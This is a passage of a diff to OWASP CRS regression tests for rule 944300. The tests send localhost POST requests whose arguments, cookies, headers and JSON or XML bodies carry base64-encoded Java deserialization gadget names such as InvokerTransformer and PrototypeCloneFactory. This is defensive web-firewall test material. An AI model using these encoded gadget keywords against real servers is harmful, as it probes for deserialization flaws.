"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 231 desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 232 desc: 
"Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 233 desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 234 desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 235 desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 236 desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 237 desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 238 desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 239 desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 240 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 241 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 242 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": 
\"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 243 desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-244 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 244 desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 245 desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 246 desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 247 desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 248 desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 249 desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 250 desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 251 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + 
expect_ids: [944300] + - test_id: 252 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 253 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 254 desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 255 desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
